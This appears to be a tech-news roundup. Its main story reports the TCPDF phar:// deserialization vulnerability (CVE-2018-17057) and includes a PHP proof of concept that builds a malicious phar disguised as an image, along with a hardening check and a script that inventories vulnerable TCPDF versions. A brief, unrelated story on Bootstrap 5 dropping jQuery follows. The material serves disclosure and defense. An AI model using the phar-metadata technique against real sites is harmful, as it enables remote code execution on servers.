Severe security bug found in popular PHP library for creating PDF files

A security researcher has found a severe security flaw in one of the internet’s most popular PHP libraries for creating PDF files.

The vulnerability impacts TCPDF, one of the “big three” PHP libraries (together with mPDF and FPDF) for converting HTML code to PDF documents or assembling PDF files on the fly.

The security flaw can be exploited by an attacker to achieve “remote code execution” on websites and web apps that use the TCPDF library, allowing a threat actor to run malicious code and potentially take over these systems.

The vulnerability, per se, is actually a variation of another researcher’s discovery.

The initial flaw was found by Secarma researcher Sam Thomas who, in a series of experiments over the summer of 2018, showcased a new class of deserialization bug affecting PHP apps. He released a research paper detailing PHP serialization attacks against the WordPress and TYPO3 CMS platforms, but also against the TCPDF library embedded inside the Contao CMS.

In a blog post published over the weekend, an Italian security researcher who goes online as Polict revealed a new PHP serialization flaw impacting TCPDF in the same way as the one discovered by Thomas last year.

Polict says the vulnerability he found can be exploited in two ways. The first case is on websites that allow user input to be part of the PDF file generation process, such as when adding names or other details inside invoices.

The second is on websites that contain cross-site scripting (XSS) vulnerabilities where an attacker can plant malicious code inside the HTML source code that will be fed to the TCPDF library to convert into a PDF.

The trick is to supply malformed data to the TCPDF library. The data is crafted so that a file path TCPDF later operates on begins with PHP’s “phar://” stream wrapper and points at an attacker-controlled phar archive. When PHP opens such a path, it unserializes the metadata stored in the archive, and a serialized object placed there by the attacker can trigger code execution on the underlying server through the PHP deserialization process.

It’s a complex attack routine, and it requires advanced PHP knowledge to exploit. Deserialization exploits, in general, are hard to uncover, and they’re the bane of many programming ecosystems besides PHP, including Ruby, Java, and .NET.
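To make the mechanism concrete, here is an added PHP illustration; it is not TCPDF’s code and reuses no TCPDF class. The DemoGadget class, the file names and the temp directory are assumptions for the demo, standing in for whatever class with a dangerous __wakeup() or __destruct() an attacker finds in a real target’s autoloaded code. It shows both halves of the technique: the attacker builds a phar archive whose metadata is a serialized object and renames it to look like an image, and the victim’s single file_exists() call on a phar:// path makes PHP unserialize that metadata before the application has done anything else. It also shows the input check a practitioner would put in front of such calls. Two caveats: writing phars needs `php -d phar.readonly=0`, and PHP 8.0 stopped unserializing phar metadata automatically when an archive is loaded, so the naive call only fires the gadget on PHP 7.x.

```php
<?php
declare(strict_types=1);

// Hypothetical gadget (assumption for this demo): any class with side effects
// in __wakeup()/__destruct() that the target application already autoloads.
class DemoGadget
{
    public $cmd = '';

    public function __wakeup()
    {
        // Runs inside unserialize() of the phar metadata, i.e. before the
        // application has done anything with the "file" it asked about.
        file_put_contents(
            sys_get_temp_dir() . '/phar_demo_triggered.txt',
            "gadget ran with cmd={$this->cmd}\n"
        );
    }
}

// Attacker side: build an archive whose metadata is a serialized DemoGadget.
// Phar's constructor insists on a .phar extension, so build first, rename later.
function buildMaliciousPhar(string $pharPath): void
{
    if (file_exists($pharPath)) {
        unlink($pharPath);
    }
    $phar = new Phar($pharPath);
    $phar->startBuffering();
    $phar->addFromString('dummy.txt', 'x');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $gadget = new DemoGadget();
    $gadget->cmd = 'id';
    $phar->setMetadata($gadget);   // serialize() of the gadget happens here
    $phar->stopBuffering();
}

// Victim side: the application only asks whether a file exists (the kind of
// call a PDF library makes for an image path), but on PHP 7.x the phar://
// wrapper loads the archive and unserialize()s its metadata to answer.
function naiveCheck(string $path): bool
{
    return file_exists($path);
}

// Hardened variant: refuse anything carrying a scheme prefix (phar://, data:,
// also Windows drive letters, which is acceptable for web upload paths), then
// confine the resolved path to an allowed base directory. If the application
// never needs phar archives, stream_wrapper_unregister('phar') at bootstrap
// removes the wrapper entirely.
function hardenedCheck(string $path, string $baseDir): bool
{
    if (preg_match('#^\s*[a-z][a-z0-9+.\-]*:#i', $path)) {
        throw new InvalidArgumentException('scheme-prefixed paths are not allowed');
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $path);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return file_exists($real);
}

$tmp = sys_get_temp_dir();
$archive   = $tmp . '/evil.phar';
$disguised = $tmp . '/evil.jpg';
$marker    = $tmp . '/phar_demo_triggered.txt';

buildMaliciousPhar($archive);
rename($archive, $disguised);   // the extension is irrelevant to phar://
@unlink($marker);

naiveCheck('phar://' . $disguised);   // PHP < 8.0: DemoGadget::__wakeup() fires here
echo 'naive check triggered gadget: ', var_export(file_exists($marker), true), "\n";

try {
    hardenedCheck('phar://' . $disguised, $tmp);
} catch (InvalidArgumentException $e) {
    echo 'hardened check blocked it: ', $e->getMessage(), "\n";
}
echo 'hardened check on a plain name: ', var_export(hardenedCheck('evil.jpg', $tmp), true), "\n";
```

Run it as `php -d phar.readonly=0 demo.php`. On PHP 7.x the first line reports `true`, because the marker file was written from inside unserialize() during file_exists(); the hardened check rejects the same string before any stream wrapper is consulted, and still works for ordinary relative names.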

FLAW FIXED IN V6.2.20… ERM… V6.2.22

The researcher says he reported the vulnerability (CVE-2018-17057) to the TCPDF library author last August. The TCPDF team released TCPDF 6.2.20 in September to address the issue.

However, users should update to at least version 6.2.22 because the TCPDF team accidentally re-introduced the vulnerability reported by Sam Thomas while attempting to patch the one reported by Polict. Both issues were deemed resolved in version 6.2.22.

The Italian security researcher published details about this vulnerability only today, six months after the patch, because of the bug’s severity and to allow website and web app owners enough time to patch.

The TCPDF library is one of today’s most popular PHP libraries and has been used all over the place: in standalone websites, in content management systems (CMSs), CMS plugins, CMS themes, enterprise intranets, CRMs, HRMs, invoicing solutions, many PDF-centered web apps, and others.

Patching isn’t as easy as it sounds. In some cases, this might mean replacing a file and editing a build instruction, but in other places, this might require rewriting large swaths of code.
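Because TCPDF is so often vendored into plugins and themes rather than installed once, the first practical step is an inventory. The following PHP script is an added example, not part of the article or of TCPDF: it walks a code base, finds every embedded copy and flags those below 6.2.22. It assumes that the version string lives in TCPDF’s `include/tcpdf_static.php` as `$tcpdf_version = '...'`, which is the layout of the 6.x releases as far as this editor knows; if a copy keeps the version elsewhere, extend the regex.

```php
<?php
declare(strict_types=1);

// First release in which both TCPDF phar deserialization issues are fixed (from the article).
const TCPDF_FIXED_VERSION = '6.2.22';

// Walk a code base and return [path => version] for every embedded TCPDF copy.
// Assumption: the version is declared in tcpdf_static.php as $tcpdf_version = '6.2.x';
function findTcpdfCopies(string $root): array
{
    $found = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $file) {
        if ($file->isDir() || $file->getFilename() !== 'tcpdf_static.php') {
            continue;
        }
        $src = file_get_contents($file->getPathname());
        if ($src !== false
            && preg_match('/\$tcpdf_version\s*=\s*[\'"]([0-9][0-9.]*)[\'"]/', $src, $m)) {
            $found[$file->getPathname()] = $m[1];
        }
    }
    ksort($found);
    return $found;
}

// Return only the copies that still need patching.
function vulnerableCopies(array $copies, string $fixed = TCPDF_FIXED_VERSION): array
{
    return array_filter(
        $copies,
        static fn (string $version): bool => version_compare($version, $fixed, '<')
    );
}

$root   = $argv[1] ?? '.';
$copies = findTcpdfCopies($root);
$bad    = vulnerableCopies($copies);

foreach ($copies as $path => $version) {
    printf("%-10s %-8s %s\n", isset($bad[$path]) ? 'VULNERABLE' : 'ok', $version, $path);
}
printf("%d TCPDF copies found, %d below %s\n", count($copies), count($bad), TCPDF_FIXED_VERSION);
exit($bad === [] ? 0 : 1);
```

Run it as `php tcpdf_inventory.php /var/www`; a non-zero exit makes it usable as a CI gate. For copies pulled in through Composer, `composer show tecnickcom/tcpdf` reports the installed version directly, but vendored copies inside plugins and themes will not appear there, which is exactly why the filesystem walk is needed.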

Bootstrap 5 will replace jQuery entirely

The Bootstrap team is nearing its goal of completely removing jQuery from its framework in favor of plain JavaScript. Bootstrap is an open-source framework for responsive, mobile-first web front ends.

The team recently released version 4.3 of the framework with its plans to remove jQuery. “The cat is out of the bag—we’re dropping our largest client-side dependency for regular JavaScript,” the team wrote in a blog post. “We’ve been working on this for a long time and have a pull request in progress and near completion.”

According to the pull request, this has been in the works since 2017. Once Bootstrap is released without jQuery, its plugins will still be usable through jQuery when jQuery is detected on the page, the team explained.

The move to remove jQuery has spurred a lot of controversy in the development community.

“This entire effort seems of dubious benefit to me,” one developer commented. “Whereas before it was ‘jQuery for EVERYTHING,’ now it seems to be the reverse: ‘remove jQuery from EVERYTHING,’ which is equally silly. jQuery does a lot of useful stuff, and all things considered remains a pretty neat project. It shouldn’t be used for everything, but spending loads of time in removing it just because it’s no longer the [cool framework] of the week just seems like a waste of effort.”

Others counter that, although jQuery was useful in its day, they now see it as unmaintained and attracting little interest or support.

“It is ‘slow’ compared to other frameworks that now use the Shadow DOM, and can be replaced with features that are native to JS — what’s there not to like about that?” another developer commented. “One less dependency, network request and more efficient code is always worth the effort.”

Other upcoming projects include improving the Bootstrap branches for development and moving to Hugo.